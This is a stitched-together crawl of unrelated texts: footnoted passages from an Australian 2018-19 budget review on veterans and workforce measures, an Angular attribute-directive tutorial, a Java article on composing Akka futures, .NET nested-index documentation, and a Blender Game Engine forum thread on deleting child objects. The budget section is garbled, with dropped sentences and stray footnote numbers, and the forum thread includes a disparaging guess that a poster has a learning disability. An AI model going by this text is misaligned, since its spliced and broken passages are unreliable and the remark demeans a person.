770. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 6-24. 771. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 190-193. 772. Department of Veterans’ Affairs (DVA), Improved dental and allied health, factsheet, DVA, Canberra, 2018, pp. 1-3. 773. Ibid., p. 2. 774. Senate Foreign Affairs, Defence and Trade Committee, Answers to Questions on Notice, Veterans’ Affairs Portfolio, Additional
Budget Estimates 2017-18, Question 58. 775. Ibid. 776. DVA, Delivering Australia’s digital future—Veteran Centric Reform—continuation, factsheet, DVA, Canberra, 2018, p. 1.
delivery.777 The Committee’s main recommendation to address these issues was adequate funding to update DVA’s IT systems.778 The Australian Public Service Commission also raised serious concerns with DVA’s service delivery models and claims processing in a 2013 capability review.779).780 Both the ANAO and the Productivity Commission reviews were recommendations of a 2017 Senate committee inquiry into suicide by veterans.781
Mental health treatment for reservists
The 2017-18 Budget included a measure to provide access to DVA-funded mental health treatments to all current and former ADF members for any recognised mental health condition—without the need to demonstrate that the condition is linked to their service.782.783 It will commence on 1 July 2018 and will not require legislation.
Increased payments for veterans undertaking study).784 DVA has raised concerns that this reduction in payments
777. Senate Foreign Affairs, Defence and Trade References Committee, Mental health of Australian Defence Force members and veterans, The Senate, Canberra, March 2016, pp. 102-14. 778. Ibid., p. 116. 779. Australian Public Service Commission (APSC), Capability review: Department of Veterans’ Affairs, APSC, Canberra,
5 December 2014. 780. Australian National Audit Office (ANAO), ‘Efficiency of veterans service delivery by the Department of Veterans’ Affairs’, ANAO website; Productivity Commission (PC), ‘Compensation and rehabilitation for veterans’, PC website. 781. Senate Foreign Affairs, Defence and Trade References Committee, The constant battle: suicide by veterans, The Senate,
Canberra, August 2017, pp. 69, 100. 782. M Klapdor, ‘Veterans’ Affairs’, Budget review 2017-18, Research paper series, 2016-17, Parliamentary Library, Canberra, May 2017. 783. DVA, Mental health treatment for Australian Defence Force reservists with disaster relief and certain other service, factsheet,
DVA, May 2018. 784. DVA, ‘7.7 Person has been incapacitated for a cumulative period exceeding 45 weeks’, Military Compensation MRCA Manuals and Resources Library, DVA website, last amended 10 August 2017.
may result in recipients making short-term decisions about employment ‘at the expense of effective rehabilitation outcomes’.785
Continuing employment programs.786.787
785. DVA, ‘Support for veterans through improved compensation arrangements—removing the stepdown for incapacity payments—increased payments for veterans studying’, factsheet, DVA, May 2018. 786. DVA, ‘Support for veterans’ employment opportunities—continuation’, factsheet, DVA, May 2018; Australian Government, ‘Industry Advisory Committee on Veterans’ Employment’, Prime Minister’s Veterans’ Employment Program website, n.d. 787. DVA, ‘Support for veterans’ employment opportunities—continuation’, op. cit.
Workforce participation measures Dr Matthew Thomas and Geoff Gilfillan
In keeping with the broader emphasis on older Australians in this year’s Budget, much of the funding for employment participation measures is directed towards supporting mature age job seekers to remain in or re-enter the workforce. Mature age job seekers are defined as those aged 45 years and older.
Mature age labour force participation
As Graph 1 indicates, labour force participation for men aged 45 to 54 years has remained strong and stable over the past 40 years, only falling slightly from around 92.5 per cent in March 1978 to 88.2 per cent in March 2018.788 Over the same time interval, the labour force participation of women of the same age has risen significantly, from 46.6 per cent to 80.2 per cent.
Graph 1: labour force participation, 45 to 54 years
Source: Australian Bureau of Statistics (ABS), Labour Force, Australia, detailed-electronic delivery, cat. no. 6291.0.55.001, ABS, March 2018.
The rate of labour force participation for men aged 55 to 64 years fell steadily from around 75 per cent in the late 1970s to around 60 per cent in the mid-1980s, as indicated in Graph 2, and remained at about this level for the next 20 years. The rate steadily increased from 60.3 per cent in March 2000 to 73.6 per cent in March 2018. Labour force participation for women aged 55 to 64 years stood at around 20 per cent from the late 1970s to the mid-1980s, but has been rising steadily to around 59.9 per cent in March 2018. The labour force participation rate for all people
788. Under the Australian Bureau of Statistics’ definition of employment, which aligns closely with international standards and guidelines, employed persons are those aged 15 years or over who, during the reference week, worked for one hour or more for pay, profit, commission or payment in-kind, in a job or business or on a farm (employees and owner managers), or worked for one hour or more without pay in a family business or on a farm (contributing family workers), or had a job, business or farm, but were temporarily not at work. Australian Bureau of Statistics (ABS), Labour statistics: concepts, sources and methods, cat. no. 6102.0.55.001, ABS, February 2018.
aged 55 to 64 years was around two-thirds (66.6 per cent) in March 2018, which compares with 47.9 per cent in March 2000.
Graph 2: labour force participation, 55 to 64 years
Source: Australian Bureau of Statistics (ABS), Labour Force, Australia, detailed-electronic delivery, cat. no. 6291.0.55.001, ABS, March 2018.
The labour force participation rate for both men and women aged 65 years and older started to accelerate from around 2004. The rate for men aged 65 years plus increased from 10.1 per cent in March 2004 to 17.6 per cent in March 2018, while the rate for women of the same age increased from 3.3 per cent to 10.3 per cent. The labour force participation rate for all people aged 65 years plus more than doubled from 6.2 per cent to 13.7 per cent during the same interval.
Increasing the labour force participation of older Australians
In the case of older Australians (55 years and older), labour force participation has increased significantly as a result of a number of factors. These are likely to include:
⢠the generally improved health of older Australians
⢠the availability of more flexible and less physically demanding forms of employment which have been used by some older Australians to transition to retirement
⢠the extended period of economic growth in Australia from the mid-1990s to the global financial crisis (GFC) of mid-2007 to 2009 which created job opportunities for older people and
⢠decisions to remain in employment longer which have been influenced by the combination of a slowing in growth of superannuation balances following the impact of the GFC and various measures introduced by successive governments to increase older worker retention, such as the increase in the age at which people are eligible for the Age Pension.789
Despite the substantial increase in participation, Australia is on some estimates still only a mid-table performer when it comes to the employment of older people compared with other OECD
789. See Australian Law Reform Commission (ALRC), Access all ages—older workers and Commonwealth laws, ALRC Report 120, ALRC, Sydney, 2013, pp. 55-56.
countries.790 There is also evidence that many older Australians who would like to work are unable to do so, whether for reasons of age discrimination or a lack of relevant skills.791 Older people who become unemployed tend to experience greater difficulty than younger people in gaining
subsequent employment.792
The Budget provides funding for a range of measures aimed at improving the labour force participation of mature age people. These include:
⢠$136.4 million over four years for training to assist job seekers aged 45 years and over with tailored career assistance and the development of information and communications technology (ICT) skills
⢠$19.3 million over three years for matched suitable training funding of up to $2,000 for workers aged 45 to 70 years who seek to stay in the workforce longer
⢠$15.2 million over three years to assist mature age workers who are likely to be retrenched or leave the workforce to remain employed or find a new job
⢠$17.7 million over four years towards Entrepreneurship Facilitators who will assist older Australians at risk of unemployment to become self-employed793 and
⢠$17.4 million over four years to establish the Skills Checkpoint for Older Workers program, which will provide employees aged 45 to 70 with guidance on transitioning into new roles within their current industry or pathways to a new career.794
The Government has also indicated that it intends to 'establish a collaborative partnership with the Age Discrimination Commissioner, business peak bodies, universities and other experts to encourage employers to create more mature age friendly workplaces and reduce age discrimination'.795
Comment
The Skills Checkpoint for Older Workers program is based on a pilot which ran from December 2015 to May 2016. The pilot was delivered in three locations by select members of the Australian Apprenticeship Support Network (AASN), and had 1,067 participants. The findings of an evaluation of the pilot undertaken concurrent with its delivery were generally positive, and some of its recommendations, such as raising the upper participation age beyond 54 years, have been adopted. It was a recommendation of the Australian Human Rights Commission's national inquiry into employment discrimination against older Australians and Australians with disability that the program be rolled out across Australia.796
It should be noted that much of the funding for the above measures is not new; many of the measures have been partially funded from existing Department of Jobs and Small Business resources.
790. PwC, Golden Age Index: how well are OECD economies harnessing the power of an older workforce?, 2016. For more detailed data on ageing and employment in Australia and other OECD countries, see the Organisation for Economic Co-operation and Development (OECD), ‘Ageing and employment policies’, OECD website.
791. Australian Human Rights Commission, Willing to work: national inquiry into employment discrimination against older Australians and Australians with disability, Australian Human Rights Commission, Sydney, 2016. 792. Ibid., p. 11. 793. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 157. 794. Ibid., p. 91. 795. Department of Jobs and Small Business, ‘2018-19 Budget Jobs and Small Business overview’, Department of Jobs and Small
Business website. 796. Australian Human Rights Commission, op. cit., p. 17.
Other workforce participation measures
While a majority of the funding for workforce participation measures in this year's Budget is directed at mature age job seekers and workers, there is also funding for:
⢠an online employment services trial for the most job-ready job seekers ($12.2 million over three years)797
⢠a trial of localised approaches to delivering employment services in ten disadvantaged regions ($18.4 million over three years)798
⢠assistance to ensure continuity of service in the transition to a new funding model for Disability Employment Services ($9.9 million over two years) and
⢠the extension of the Transition to Work program which provides intensive, pre-employment support to early school leavers aged 15 to 21 years to improve their work readiness and help them into work or education ($89.0 million over four years).799
It should be noted that, once again, much of the funding for these measures has been derived from existing resources. While the budget papers state that an additional $89.0 million has been allocated towards the Transition to Work program it is not clear how this reconciles with the figures in the financial table at page 160 of Budget Paper no. 2, which indicate a reduction in funding over the forward estimates.
None of the above measures will require legislation.
797. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 158. 798. Ibid., p. 159. 799. Ibid., pp. 160-161.
Extending mutual obligation—court-ordered fines and arrest warrants
Don Arthur
According to the original principle of mutual obligation, recipients of unemployment payments have obligations to search for work, take advantage of opportunities to improve their employability, and to work in return for income support.800 Recipients who fail to meet their obligations can have their payments suspended or cancelled.8.802
These measures are subject to the passage of legislation.803.804
The measures
Under the 'Encouraging lawful behaviour of income support recipients' measures, the Australian Government will work with states and territories to ensure people on income support pay fines and clear outstanding arrest warrants.805.806
Arrest warrants
According to a DSS fact sheet: 'From 1 March 2019, people receiving welfare payments with outstanding arrest warrants for indictable criminal offences will have their payment suspended or reduced by half if they have dependent children.'807
Recipients who clear their warrants within four weeks will have their payments reinstated from the date the warrant was cleared. Recipients who fail to clear their warrants within four weeks will have their payments cancelled.808
800. D Kemp (Minister for Employment, Education, Training and Youth Affairs), Unemployed young people to take responsibility for their future, media release, 28 January 1998. 801. Department of Human Services (DHS), ‘Mutual obligation requirements’, DHS website. 802.. 803. DHS, Encouraging Lawful Behaviour of Income Support Recipients [May 2018]. 804. N Bita, ‘Cop it sweet for dole’, Courier Mail, 10 May 2018, p. 1. 805. Department of Social Services (DSS), Encouraging lawful behaviour of income support recipients, fact sheet, DSS, Canberra, May 2018. 806. Ibid., p. 2. 807. Ibid. 808. Ibid.
People who make a new claim or transfer between payments from 1 March 2019 will be required to provide information about any outstanding arrest warrants and agree to police checks. If they have an outstanding warrant and fail to clear it within seven days, their claim will be rejected.809).810
Court-imposed fines.811
Issues
International experience
Similar requirements have been imposed in New Zealand, the United States (US) and the Canadian province of British Columbia.812
The US Social Security Administration experienced some difficulty obtaining and processing state government data.813 It faced a number of lawsuits and responded by changing the way it administers the program. Congress is currently considering new legislation.814
Implementation has been more straightforward in New Zealand. Most recipients have their warrant cleared without a benefit suspension or reduction.815 Unlike the US and Australia, New Zealand has only one level of government.
Court-imposed fines and vulnerable recipients
The National Social Security Rights Network and the Australian Council of Social Service argue that the court-imposed fines measure could push some vulnerable income support recipients into
809. Ibid. 810. LexisNexis, Encyclopaedic Australian Legal Dictionary 811. Department of Social Services (DSS), op. cit. 812.. 813. US General Accounting Office (GAO), Social Security Administration: Fugitive Felon Program could benefit from better use of technology, US GAO, Washington, 2002. 814. United States, Republican Policy Committee (RPC), ‘HR 2792, the Control Unlawful Fugitive Felons Act of 2017’, RPC website. 815. New Zealand, Privacy Commissioner, ‘Justice/MSD Warrants to Arrest Programme’, Privacy Commissioner website.
homelessness.816.817 Indigenous people are also disproportionately affected by fines.818 The National Aboriginal and Torres Strait Islander Legal Services (NATSILS) and the National Congress of Australia's First Peoples have expressed concern about this measure.819
This suggests that if governments are going to work together to deal with the problem of offending by income support recipients, they could look at the problem more broadly and consider a wider range of options.
816. C Knaus, 'Coalition's "brutal" plan to dock welfare for fines savaged by advocates', The Guardian, 9 May 2018. 817. NSW Sentencing Council, The effectiveness of fines as a sentencing option: court-imposed fines and penalty notices: interim report, 2006, p. 29. 818. M Spiers Williams and R Gilbert, 'Reducing the unintended impacts of fines', Current Initiatives Paper 2, January 2011. 8, 9 May 2018.
An Attribute directive changes the appearance or behavior of a DOM element.
There are three kinds of directives in Angular:
Components are the most common of the three directives. You saw a component for the first time in the QuickStart guide.
Structural Directives change the structure of the view. Two examples are NgFor and NgIf. Learn about them in the Structural Directives guide.
Attribute directives are used as attributes of elements. The built-in NgStyle directive in the Template Syntax guide, for example, can change several element styles at the same time. The appHighlight directive built in this guide is applied like this:
<p appHighlight>Highlight me!</p>:
import { Directive } from '@angular/core';

@Directive({
  selector: '[appHighlight]'
})
export class HighlightDirective {
  constructor() { }
}
The imported Directive symbol provides Angular the @Directive decorator.
The @Directive decorator's lone configuration property specifies the directive's CSS selector, [appHighlight]; the CLI adds the app prefix for you.
Make sure you do not prefix the highlight directive name with ng, because that prefix is reserved for Angular and using it could cause bugs that are difficult to diagnose.
import { Directive, ElementRef } from '@angular/core';

@Directive({
  selector: '[appHighlight]'
})
export class HighlightDirective {
  constructor(el: ElementRef) {
    el.nativeElement.style.backgroundColor = 'yellow';
  }
}
The import statement specifies an additional ElementRef symbol from the Angular core library. You use the ElementRef in the directive's constructor to inject a reference to the host DOM element, the element to which you applied appHighlight.
To use the new HighlightDirective, add a paragraph (<p>) element to the template of the root AppComponent and apply the directive as an attribute.
Currently, appHighlight simply sets an element color. The directive could be more dynamic. It could detect when the user mouses into or out of the element and respond by setting or clearing the highlight color.
Begin by adding HostListener to the list of imported symbols.
import { Directive, ElementRef, HostListener } from '@angular/core';
Then add two event handlers that respond when the mouse enters or leaves, each adorned by the @HostListener decorator.
@HostListener('mouseenter') onMouseEnter() {
  this.highlight('yellow');
}

@HostListener('mouseleave') onMouseLeave() {
  this.highlight(null);
}

private highlight(color: string) {
  this.el.nativeElement.style.backgroundColor = color;
}
The @HostListener decorator lets you subscribe to events of the DOM element that hosts an attribute directive, the <p> in this case.
Of course you could reach into the DOM with standard JavaScript and attach event listeners manually, but it's better to let Angular manage the wiring. The handlers delegate to a helper method that sets the color on the host DOM element, el.
The helper method, highlight, was extracted from the constructor. The revised constructor simply declares the injected el: ElementRef.
constructor(private el: ElementRef) { }
Here's the updated directive in full:
import { Directive, ElementRef, HostListener } from '@angular/core';

@Directive({
  selector: '[appHighlight]'
})
export class HighlightDirective {
  constructor(private el: ElementRef) { }

  @HostListener('mouseenter') onMouseEnter() {
    this.highlight('yellow');
  }

  @HostListener('mouseleave') onMouseLeave() {
    this.highlight(null);
  }

  private highlight(color: string) {
    this.el.nativeElement.style.backgroundColor = color;
  }
}
Run the app and confirm that the background color appears when the mouse hovers over the p and disappears as it moves out.
@Input data binding
Currently the highlight color is hard-coded within the directive. That's inflexible. In this section, you give the developer the power to set the highlight color while applying the directive.
Begin by adding Input to the list of symbols imported from @angular/core.
import { Directive, ElementRef, HostListener, Input } from '@angular/core';
Add a highlightColor property to the directive class like this:
@Input() highlightColor: string;
@Input property
Notice the @Input decorator. It adds metadata to the class that makes the directive's highlightColor property available for binding. Try it by adding the following directive binding variations to the AppComponent template:
<p appHighlight highlightColor="yellow">Highlighted in yellow</p>
<p appHighlight [highlightColor]="'orange'">Highlighted in orange</p>
Add a color property to the AppComponent.
export class AppComponent {
  color = 'yellow';
}
Let it control the highlight color with a property binding.
<p appHighlight [highlightColor]="color">Highlighted with parent component's color</p>
That's good, but it would be nice to simultaneously apply the directive and set the color in the same attribute like this.
<p [appHighlight]="color">Highlight me!</p>
@Input() appHighlight: string;
This is disagreeable. The word, appHighlight, is a terrible property name and it doesn't convey the property's intent.
@Input alias
Fortunately you can name the directive property whatever you want and alias it for binding purposes.
Restore the original property name and specify the selector as the alias in the argument to @Input.
@Input('appHighlight') highlightColor: string;
Inside the directive the property is known as highlightColor. Outside the directive, where you bind to it, it's known as appHighlight.
You get the best of both worlds: the property name you want and the binding syntax you want:
<p [appHighlight]="color">Highlight me!</p>
Now that you're binding via the alias to the highlightColor, modify the onMouseEnter() method to use that property. If someone neglects to bind to appHighlight, highlight the host element in red:
@HostListener('mouseenter') onMouseEnter() {
  this.highlight(this.highlightColor || 'red');
}
Here's the latest version of the directive class.
import { Directive, ElementRef, HostListener, Input } from '@angular/core';

@Directive({
  selector: '[appHighlight]'
})
export class HighlightDirective {
  constructor(private el: ElementRef) { }

  @Input('appHighlight') highlightColor: string;

  @HostListener('mouseenter') onMouseEnter() {
    this.highlight(this.highlightColor || 'red');
  }

  @HostListener('mouseleave') onMouseLeave() {
    this.highlight(null);
  }

  private highlight(color: string) {
    this.el.nativeElement.style.backgroundColor = color;
  }
}
Revise the AppComponent.color so that it has no initial value.

export class AppComponent {
  color: string;
}
Here are the harness and directive in action. Add a second input property to HighlightDirective called defaultColor:
@Input() defaultColor: string;
Revise the directive's onMouseEnter so that it first tries to highlight with the highlightColor, then with the defaultColor, and falls back to "red" if both properties are undefined.
@HostListener('mouseenter') onMouseEnter() {
  this.highlight(this.highlightColor || this.defaultColor || 'red');
}
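For illustration, the precedence chain in that handler can be isolated as a tiny pure function (pickColor is a name invented here; it is not part of the guide's directive):

```typescript
// Mirrors: this.highlightColor || this.defaultColor || 'red'
function pickColor(highlightColor?: string, defaultColor?: string): string {
  return highlightColor || defaultColor || 'red';
}

console.log(pickColor());                    // 'red'    (nothing bound)
console.log(pickColor(undefined, 'violet')); // 'violet' (only defaultColor bound)
console.log(pickColor('cyan', 'violet'));    // 'cyan'   (bound color wins)
```

Because `||` treats the empty string as falsy, binding an empty color also falls through to the default, which matches the directive's behavior.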
How do you bind to a second property when you're already binding to the appHighlight property name? As with components, you can add as many directive property bindings as you need by stringing them along in the template:

<p [appHighlight]="color" defaultColor="violet">Highlight me too!</p>
Angular knows that the defaultColor binding belongs to the HighlightDirective because you made it public with the @Input decorator.
Here's how the harness should work when you're done coding.
This page covered how to:

- build an attribute directive that modifies the behavior of an element
- apply the directive to an element in a template
- respond to user-initiated events with @HostListener
- pass values into the directive with an @Input data binding
- bind to a second property
The final source code follows:
import { Component } from '@angular/core';

@Component({
  selector: 'app-root',
  templateUrl: './app.component.html'
})
export class AppComponent {
  color: string;
}
<p [appHighlight]="color" defaultColor="violet">
  Highlight me too!
</p>
/* tslint:disable:member-ordering */
import { Directive, ElementRef, HostListener, Input } from '@angular/core';

@Directive({
  selector: '[appHighlight]'
})
export class HighlightDirective {
  constructor(private el: ElementRef) { }

  @Input() defaultColor: string;

  @Input('appHighlight') highlightColor: string;

  @HostListener('mouseenter') onMouseEnter() {
    this.highlight(this.highlightColor || this.defaultColor || 'red');
  }

  @HostListener('mouseleave') onMouseLeave() {
    this.highlight(null);
  }

  private highlight(color: string) {
    this.el.nativeElement.style.backgroundColor = color;
  }
}
import { NgModule } from '@angular/core';
import { BrowserModule } from '@angular/platform-browser';

import { AppComponent } from './app.component';
import { HighlightDirective } from './highlight.directive';

@NgModule({
  imports: [ BrowserModule ],
  declarations: [
    AppComponent,
    HighlightDirective
  ],
  bootstrap: [ AppComponent ]
})
export class AppModule { }
import { enableProdMode } from '@angular/core';
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';

import { AppModule } from './app/app.module';
import { environment } from './environments/environment';

if (environment.production) {
  enableProdMode();
}

platformBrowserDynamic().bootstrapModule(AppModule);
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <title>Attribute Directives</title>
    <base href="/">
    <meta name="viewport" content="width=device-width, initial-scale=1">
  </head>
  <body>
    <app-root></app-root>
  </body>
</html>
Appendix: Why add @Input?
In this demo, the highlightColor property is an input property of the HighlightDirective. You've seen it applied without an alias:
@Input() highlightColor: string;
You've seen it with an alias:
@Input('appHighlight') highlightColor: string;
Either way, the @Input decorator tells Angular that this property is public and available for binding by a parent component. Without @Input, Angular refuses to bind to the property.
But a component or directive shouldn't blindly trust other components and directives. The properties of a component or directive are hidden from binding by default. They are private from an Angular binding perspective. When adorned with the @Input decorator, the property becomes public from an Angular binding perspective; only then can some other component or directive bind to it. You can tell if @Input is needed by the position of the property name in a binding: when it appears to the right of the equals (=), it belongs to the template's component and needs no decorator.
When it appears in square brackets ([ ]) to the left of the equals (=), the property belongs to some other component or directive; that property must be adorned with the @Input decorator.
Now apply that reasoning to the following example:
<p [appHighlight]="color">Highlight me!</p>
The color property in the expression on the right belongs to the template's component. The template and its component trust each other. The color property doesn't require the @Input decorator.
The appHighlight property on the left refers to an aliased property of the HighlightDirective, not a property of the template's component. There are trust issues. Therefore, the directive property must carry the @Input decorator.
© 2010–2018 Google, Inc.
Licensed under the Creative Commons Attribution License 4.0. | http://docs.w3cub.com/angular/guide/attribute-directives/ | CC-MAIN-2018-43 | en | refinedweb |
Composing Futures with Akka
Composing Futures provides a way to do two (or more) things at the same time and then wait until they are done. Typically in Java this would be done with a ExecutorService.
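For contrast, a minimal plain-JDK sketch of "run two tasks, then wait for both" with an ExecutorService looks like this (the class name and values here are illustrative, not from the article):

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

public class ExecutorCompose {

    // Submit two tasks, then block on each Future until both results are in.
    static long sumInParallel() throws Exception {
        ExecutorService pool = Executors.newFixedThreadPool(2);
        try {
            Future<Long> a = pool.submit(() -> 20L);
            Future<Long> b = pool.submit(() -> 22L);
            return a.get() + b.get(); // get() blocks until each task completes
        } finally {
            pool.shutdown();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(sumInParallel()); // prints 42
    }
}
```

With the plain API you wait and combine results by hand; the point of Akka's composed futures below is to express the same pipeline declaratively.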
It is very often desirable to be able to combine different Futures with each other. Akka provides additional constructs that greatly simplify some common use cases, like making parallel remote service calls, then collecting and mapping the results.
In this article, I will create a simple Java program that explores composing futures with Akka. The sample program works with Akka 2.1.1:
<dependency>
  <groupId>com.typesafe.akka</groupId>
  <artifactId>akka-actor_2.10</artifactId>
  <version>2.1.1</version>
</dependency>
Let's set up a Callable class that does some work and then returns a result. For this example, the work is just to pause for a random amount of time, and the result is the amount of time it paused for.
import java.util.concurrent.Callable;

public class RandomPause implements Callable<Long> {

    private Long millisPause;

    public RandomPause() {
        millisPause = Math.round(Math.random() * 3000) + 1000; // 1,000 to 4,000
        System.out.println(this.toString() + " will pause for " + millisPause + " milliseconds");
    }

    public Long call() throws Exception {
        Thread.sleep(millisPause);
        System.out.println(this.toString() + " was paused for " + millisPause + " milliseconds");
        return millisPause;
    }
}

Akka's Future has several monadic methods that are very similar to the ones used by Scala's collections. These allow you to create 'pipelines' or 'streams' that the result will travel through.
Here is Java app to compose the RandomPause futures.
import static akka.dispatch.Futures.future;
import static akka.dispatch.Futures.sequence;

import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;

import scala.concurrent.Await;
import scala.concurrent.ExecutionContext;
import scala.concurrent.Future;
import scala.concurrent.duration.Duration;

import akka.dispatch.ExecutionContexts;
import akka.dispatch.Mapper;

public class SimpleFutures {

    public static void main(String[] args) {
        ExecutorService executor = Executors.newFixedThreadPool(4);
        ExecutionContext ec = ExecutionContexts.fromExecutorService(executor);

        List<Future<Long>> futures = new ArrayList<Future<Long>>();
        System.out.println("Akka Futures says: Adding futures for two random length pauses");
        futures.add(future(new RandomPause(), ec));
        futures.add(future(new RandomPause(), ec));
        System.out.println("Akka Futures says: There are " + futures.size() + " RandomPause's currently running");

        // compose a sequence of the futures
        Future<Iterable<Long>> futuresSequence = sequence(futures, ec);

        // Find the sum of the pause durations
        Future<Long> futureSum = futuresSequence.map(
            new Mapper<Iterable<Long>, Long>() {
                public Long apply(Iterable<Long> ints) {
                    long sum = 0;
                    for (Long i : ints) sum += i;
                    return sum;
                }
            }, ec);

        // block until the futures come back
        futureSum.onSuccess(new PrintResult<Long>(), ec);
        try {
            System.out.println("Result :" + Await.result(futureSum, Duration.apply(5, TimeUnit.SECONDS)));
        } catch (Exception e) {
            e.printStackTrace();
        }
        executor.shutdown();
    }
}

Explanation:
In order to execute callbacks and operations, Futures need something called an ExecutionContext, which is very similar to a java.util.concurrent.Executor. In the above program, I have provided my own ExecutorService and passed it to factory methods provided by the ExecutionContexts.
Take note of 'sequence' that combines different Futures with each other.
To better explain what happened in the example, Future.sequence is taking the Iterable<Future<Long>> and turning it into a Future<Iterable<Long>>. We can then use map to work with the Iterable<Long> directly, and we aggregate the sum of the Iterable.
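The same sequence-then-map shape can also be sketched with the JDK's own CompletableFuture (JDK 8+; this is an analogy for readers without Akka on the classpath, not part of the Akka API):

```java
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.stream.Collectors;

public class SequenceDemo {

    // Turn a List<CompletableFuture<Long>> into a CompletableFuture<List<Long>>,
    // mirroring Akka's Futures.sequence, then map the list to its sum.
    static CompletableFuture<Long> sum(List<CompletableFuture<Long>> futures) {
        return CompletableFuture
                .allOf(futures.toArray(new CompletableFuture[0]))
                .thenApply(v -> futures.stream()
                        .map(CompletableFuture::join)   // all are done, join() won't block
                        .collect(Collectors.toList()))
                .thenApply(pauses -> pauses.stream().mapToLong(Long::longValue).sum());
    }

    public static void main(String[] args) {
        List<CompletableFuture<Long>> fs = Arrays.asList(
                CompletableFuture.completedFuture(2306L),
                CompletableFuture.completedFuture(3892L));
        System.out.println(sum(fs).join()); // prints 6198
    }
}
```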
Finally, PrintResult simply prints the output of futureSum.
import akka.dispatch.OnSuccess;

public final class PrintResult<T> extends OnSuccess<T> {
    @Override
    public final void onSuccess(T t) {
        System.out.println("PrintResults says: Total pause was for " + ((Long) t) + " milliseconds");
    }
}
Output:
Akka Futures says: Adding futures for two random length pauses
RandomPause@55e859c0 will pause for 3892 milliseconds
RandomPause@5430d082 will pause for 2306 milliseconds
Akka Futures says: There are 2 RandomPause's currently running
RandomPause@5430d082 was paused for 2306 milliseconds
RandomPause@55e859c0 was paused for 3892 milliseconds
PrintResults says: Total pause was for 6198 milliseconds

Note: Akka Actors are not used in this example.
Published at DZone with permission of Nishant Chandra, DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own.
Nested Property Index
Overview
An index can be defined on a nested property to improve performance of nested queries - this is highly recommended.
Nested properties indexing uses an additional
[SpaceIndex] attribute -
Path.
The SpaceIndex.Path Attribute
The Path attribute represents the path of the property within the nested object.
Below is an example of defining an index on a nested property:
[SpaceClass]
public class Person {
    // Properties ...

    // this defines an Extended index on the PersonalInfo.SocialSecurity property
    [SpaceIndex(Path = "SocialSecurity", Type = SpaceIndexType.Extended)]
    public Info PersonalInfo { get; set; }

    // .....
}

public class Info {
    public String Name { get; set; }
    public Address Address { get; set; }
    public DateTime Birthday { get; set; }
    public long SocialSecurity { get; set; }
    public int Id;
}

public class Address {
    private int ZipCode { get; set; }
    private String Street { get; set; }
}
[SpaceClass]
public class Person {
    // Properties ...

    // this defines several indexes on the same PersonalInfo property
    [SpaceIndex(Path = "SocialSecurity", Type = SpaceIndexType.Extended)]
    [SpaceIndex(Path = "Address.ZipCode", Type = SpaceIndexType.Basic)]
    [SpaceProperty(StorageType = StorageType.Document)]
    public Info PersonalInfo { get; set; }

    // this defines indexes on map keys
    [SpaceIndex(Path = "Key1", Type = SpaceIndexType.Basic)]
    [SpaceIndex(Path = "Key2", Type = SpaceIndexType.Basic)]
    public Dictionary<String, String> Table { get; set; }
}
The following is an example of query code that automatically triggers this index:
SqlQuery<Person> query = new SqlQuery<Person>(
    "PersonalInfo.SocialSecurity<10000050L and PersonalInfo.SocialSecurity>=10000010");
Nested Objects
By default, nested objects are kept in a binary form inside the space. In order to support nested matching, the relevant property should be stored as a document, or as an object if it is in an interoperability scenario and has a corresponding Java class.
Dictionary based Nested Properties
The same indexing techniques above are also applicable to Dictionary-based nested properties, which means that in the example above the Info and Address classes could be replaced with a Dictionary<String, Object>, with the dictionary keys representing the property names.
How to make Launch Screen only portrait not support other orientations
I need the launch screen to be portrait only, while every other view controller supports all orientations. First I tried this method: IOS 8 iPad make only Launch Screen portrait only, but with it the other view controllers no longer support all orientations. How can I fix this?
Is there a script to delete all children of an object?
Need this fast…thanks
import bge

cont = bge.logic.getCurrentController()
own = cont.owner()

if object.children != None:
    for objects in children:
        objects.endObject()
import bge

cont = bge.logic.getCurrentController()
own = cont.owner

if own.children != None:
    for objects in own.children:
        objects.endObject()
Ok, but why does this happen? (press play and press 1,2,3 multiple times)
the guns glitch up…I checked everything and don’t know what’s wrong
I’ll attach a google drive one
Ok, I see this setup and it’s a little hard to handle
I will try and cook you up something less “divided” as it’s hard to tell what is going on.
ok check this out,
this does the exact same thing, but the gun is self contained.
mind you you will have to setup each gun, but it should make it much easier
WeaponSelfContained.blend (460 KB)
I am going to build the full system, as I need the same thing for wrectified,
here is an updated version (all I am doing for tonight)
this manages reloading (R key)
the player can activate firing, but firing is in the gun
the player activates reloading but reloading is in the gun
the player's gun-switching system removes the ammo, and adds it to stock, then ends the gun
WeaponSelfContainedV2.blend (494 KB)
@BluePrintRandom, there is an EDIT button. We told you multiple times to use it. It is left of the reply button. Even a child is able to find it.
Your subsequent posts are flooding the forum.
It does get a little obnoxious, so I agree with Monster. Still looks good though, BPR. But I bet my dog could find the edit button.
IIRC, you also told him that “objects” is not a proper name when referencing a single object, among other things.
In reading (or trying to read) a number of his posts, I am now convinced that he suffers from a learning disability of some sort. I feel sorry for him, but I don’t think he should be allowed to spam threads, and the forum in general.
PS:
The function that should actually end all children (his code doesn’t deal with children’s children):
def end_children(parent):
    for c in parent.children:
        end_children(c)
        c.endObject()
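Outside Blender, the depth-first order of that recursion can be sketched with plain Python (Node here is a hypothetical stand-in for KX_GameObject, since bge can't be imported outside the BGE):

```python
class Node:
    """Hypothetical stand-in for a BGE KX_GameObject with children."""
    def __init__(self, name, children=None):
        self.name = name
        self.children = children or []
        self.ended = False

    def endObject(self):
        self.ended = True


def end_children(parent, order=None):
    # Depth-first: grandchildren are ended before their parents,
    # so no object is touched after its parent is already gone.
    if order is None:
        order = []
    for c in parent.children:
        end_children(c, order)
        c.endObject()
        order.append(c.name)
    return order


root = Node("root", [Node("a", [Node("a1")]), Node("b")])
print(end_children(root))  # ['a1', 'a', 'b'] -- root itself is left alone
```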
isn’t that what I’ve already done?
